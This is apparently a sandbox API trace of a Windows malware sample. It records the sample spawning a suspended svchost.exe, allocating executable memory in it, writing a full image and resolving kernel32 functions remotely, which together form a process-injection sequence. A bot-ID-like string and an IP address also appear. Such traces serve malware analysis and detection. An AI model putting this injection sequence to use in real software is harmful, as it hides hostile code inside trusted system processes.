	[0187.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50
	[0187.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6df8
	[0187.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611", cchWideChar=-1, lpMultiByteStr=0x22c6df8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611", lpUsedDefaultChar=0x0) returned 50
	[0187.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="84.182.248.91", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
	[0187.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="84.182.248.91", cchWideChar=-1, lpMultiByteStr=0x22ad108, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="84.182.248.91", lpUsedDefaultChar=0x0) returned 14
	[0187.594] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad348) returned 1
	[0187.594] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6df8) returned 1
	[0187.594] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.594] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.594] lstrcmpiW (lpString1="sTart", lpString2="start") returned 0
	[0187.594] GetStartupInfoW (in: lpStartupInfo=0x128740 | out: lpStartupInfo=0x128740*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5ce492, hStdError=0x3)) 
	[0187.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.595] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x128740*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5ce492, hStdError=0x3), lpProcessInformation=0x128784 | out: lpCommandLine="svchost.exe", lpProcessInformation=0x128784*(hProcess=0x47c, hThread=0x13c, dwProcessId=0x110, dwThreadId=0x418)) returned 1
	[0187.599] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.599] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x478
	[0187.599] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x468
	[0187.599] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x474
	[0187.599] GetCurrentProcess () returned 0xffffffff
	[0187.599] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0x47c, lpTargetHandle=0x128710, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128710*=0x4) returned 1
	[0187.599] GetCurrentProcess () returned 0xffffffff
	[0187.599] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x468, hTargetProcessHandle=0x47c, lpTargetHandle=0x128714, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128714*=0x8) returned 1
	[0187.599] GetCurrentProcess () returned 0xffffffff
	[0187.599] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x474, hTargetProcessHandle=0x47c, lpTargetHandle=0x128718, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128718*=0xc) returned 1
	[0187.599] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x16f, flAllocationType=0x3000, flProtect=0x40) returned 0x50000
	[0187.599] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x50000, lpBuffer=0xd712d0*, nSize=0x16f, lpNumberOfBytesWritten=0x1285bc | out: lpBuffer=0xd712d0*, lpNumberOfBytesWritten=0x1285bc*=0x16f) returned 1
	[0187.600] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.600] GetProcAddress (hModule=0x76b10000, lpProcName="SignalObjectAndWait") returned 0x76b761d9
	[0187.600] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0187.600] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0187.600] GetProcAddress (hModule=0x76b10000, lpProcName="ResetEvent") returned 0x76b5bcb4
	[0187.601] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0187.601] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0187.601] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0187.601] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0187.601] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x40) returned 0x60000
	[0187.601] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128710*, nSize=0x70, lpNumberOfBytesWritten=0x1285bc | out: lpBuffer=0x128710*, lpNumberOfBytesWritten=0x1285bc*=0x70) returned 1
	[0187.602] NtQueryInformationProcess (in: ProcessHandle=0x47c, ProcessInformationClass=0x0, ProcessInformation=0x1285a4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x1285a4, ReturnLength=0x0) returned 0x0
	[0187.602] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x7ffd4000, lpBuffer=0x1285bc, nSize=0x10, lpNumberOfBytesRead=0x128448 | out: lpBuffer=0x1285bc*, lpNumberOfBytesRead=0x128448*=0x10) returned 1
	[0187.602] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x600000, lpBuffer=0x128564, nSize=0x40, lpNumberOfBytesRead=0x128448 | out: lpBuffer=0x128564*, lpNumberOfBytesRead=0x128448*=0x40) returned 1
	[0187.602] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x6000d8, lpBuffer=0x12846c, nSize=0xf8, lpNumberOfBytesRead=0x128448 | out: lpBuffer=0x12846c*, lpNumberOfBytesRead=0x128448*=0xf8) returned 1
	[0187.602] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x602104, lpBuffer=0x128780*, nSize=0xc, lpNumberOfBytesWritten=0x1285bc | out: lpBuffer=0x128780*, lpNumberOfBytesWritten=0x1285bc*=0xc) returned 1
	[0187.602] ResetEvent (hEvent=0x468) returned 1
	[0187.602] ResetEvent (hEvent=0x478) returned 1
	[0187.602] ResumeThread (hThread=0x13c) returned 0x1
	[0187.602] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.615] VirtualAllocEx (hProcess=0x47c, lpAddress=0x10000000, dwSize=0x97000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000
	[0187.615] VirtualAllocEx (hProcess=0x47c, lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000
	[0187.616] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10000000, lpBuffer=0xe50020*, nSize=0x400, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0xe50020*, lpNumberOfBytesWritten=0x1286e4*=0x400) returned 1
	[0187.616] VirtualProtectEx (in: hProcess=0x47c, lpAddress=0x10000000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0187.616] VirtualAllocEx (hProcess=0x47c, lpAddress=0x10001000, dwSize=0x53c00, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000
	[0187.617] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x53c00) returned 0x2732590
	[0187.617] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10001000, lpBuffer=0x2732590*, nSize=0x53c00, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2732590*, lpNumberOfBytesWritten=0x1286d0*=0x53c00) returned 1
	[0187.625] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10001000, lpBuffer=0xe50420*, nSize=0x53c00, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0xe50420*, lpNumberOfBytesWritten=0x1286e4*=0x53c00) returned 1
	[0187.632] VirtualAllocEx (hProcess=0x47c, lpAddress=0x10055000, dwSize=0x13a00, flAllocationType=0x1000, flProtect=0x4) returned 0x10055000
	[0187.632] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x13a00) returned 0x2732590
	[0187.632] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055000, lpBuffer=0x2732590*, nSize=0x13a00, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2732590*, lpNumberOfBytesWritten=0x1286d0*=0x13a00) returned 1
	[0187.635] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055000, lpBuffer=0xea4020*, nSize=0x13a00, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0xea4020*, lpNumberOfBytesWritten=0x1286e4*=0x13a00) returned 1
	[0187.636] VirtualAllocEx (hProcess=0x47c, lpAddress=0x10069000, dwSize=0x285a8, flAllocationType=0x1000, flProtect=0x4) returned 0x10069000
	[0187.637] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x285b0) returned 0x2732590
	[0187.637] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10069000, lpBuffer=0x2732590*, nSize=0x285a8, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2732590*, lpNumberOfBytesWritten=0x1286d0*=0x285a8) returned 1
	[0187.641] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10069000, lpBuffer=0xeb7a20*, nSize=0x25c00, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0xeb7a20*, lpNumberOfBytesWritten=0x1286e4*=0x25c00) returned 1
	[0187.644] VirtualAllocEx (hProcess=0x47c, lpAddress=0x10092000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x10092000
	[0187.644] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x200) returned 0x2732590
	[0187.644] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10092000, lpBuffer=0x2732590*, nSize=0x200, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2732590*, lpNumberOfBytesWritten=0x1286d0*=0x200) returned 1
	[0187.645] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10092000, lpBuffer=0xedd620*, nSize=0x200, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0xedd620*, lpNumberOfBytesWritten=0x1286e4*=0x200) returned 1
	[0187.645] VirtualAllocEx (hProcess=0x47c, lpAddress=0x10093000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x10093000
	[0187.645] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x200) returned 0x2732590
	[0187.645] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10093000, lpBuffer=0x2732590*, nSize=0x200, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2732590*, lpNumberOfBytesWritten=0x1286d0*=0x200) returned 1
	[0187.646] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10093000, lpBuffer=0xedd820*, nSize=0x200, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0xedd820*, lpNumberOfBytesWritten=0x1286e4*=0x200) returned 1
	[0187.646] VirtualAllocEx (hProcess=0x47c, lpAddress=0x10094000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x10094000
	[0187.646] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x3000) returned 0x2732590
	[0187.646] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10094000, lpBuffer=0x2732590*, nSize=0x3000, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x2732590*, lpNumberOfBytesWritten=0x1286d0*=0x3000) returned 1
	[0187.647] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10094000, lpBuffer=0xedda20*, nSize=0x3000, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0xedda20*, lpNumberOfBytesWritten=0x1286e4*=0x3000) returned 1
	[0187.647] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.648] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0187.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6d70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0187.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6d70, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13
	[0187.648] lstrlenW (lpString="KERNEL32.dll") returned 12
	[0187.648] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.648] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0187.648] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0187.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.648] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.648] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0187.649] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0187.649] ResetEvent (hEvent=0x478) returned 1
	[0187.649] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.650] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0187.650] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.650] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.650] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.650] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.650] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.650] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.650] lstrlenA (lpString="QueryPerformanceFrequency") returned 25
	[0187.650] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.650] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7906*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7906*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0187.651] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.651] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.651] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.651] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.651] ResetEvent (hEvent=0x478) returned 1
	[0187.651] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.652] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.652] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.652] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.652] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.652] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550b8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.652] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.652] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.652] lstrlenA (lpString="SetCurrentDirectoryA") returned 20
	[0187.652] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.653] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6d5a*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6d5a*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0187.653] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.653] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.653] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.653] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.654] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.654] ResetEvent (hEvent=0x478) returned 1
	[0187.654] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.654] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.654] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.654] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.654] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.654] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550bc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.655] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.655] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.655] lstrlenA (lpString="GetCurrentDirectoryA") returned 20
	[0187.655] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.655] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6d42*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6d42*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0187.655] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.655] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.655] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.656] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.656] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.656] ResetEvent (hEvent=0x478) returned 1
	[0187.656] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.656] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.656] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.657] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.657] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.657] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550c0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.657] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.657] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.657] lstrlenA (lpString="GetTickCount") returned 12
	[0187.657] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.657] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6d32*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6d32*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.658] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.658] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.658] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.658] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.658] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.658] ResetEvent (hEvent=0x478) returned 1
	[0187.658] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.659] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.659] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.659] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.659] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.659] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550c4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.659] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.659] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.659] lstrlenA (lpString="GetSystemTime") returned 13
	[0187.660] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.660] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6d22*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6d22*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
